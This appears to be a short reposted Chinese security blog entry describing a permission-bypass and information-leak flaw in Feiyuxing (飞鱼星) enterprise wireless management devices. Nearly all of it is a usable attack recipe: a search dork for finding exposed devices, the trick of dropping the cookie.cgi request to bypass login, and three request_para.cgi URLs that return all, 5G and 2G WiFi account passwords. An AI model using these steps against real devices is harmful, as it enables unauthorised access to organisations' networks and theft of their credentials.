飞鱼星企业级智能无线上网行为管理系统以及众多产品存在权限绕过漏洞。
title="飞鱼星"
访问 index.html 或者 home/index.html 抓包,丢掉cookie.cgi就行了
越权成功后访问下面的地址还可以获取wifi账号密码
/request_para.cgi?parameter=wifi_info #获取ALL WIFI账号密码
/request_para.cgi?parameter=wifi_get_5g_host #获取5GWIFI账号密码
/request_para.cgi?parameter=wifi_get_2g_host #获取2GWIFI账号密码
小知识
声明
原文始发于微信公众号(丁永博的成长日记):飞鱼星 智能上网行为管理系统 权限绕过+信息泄露漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论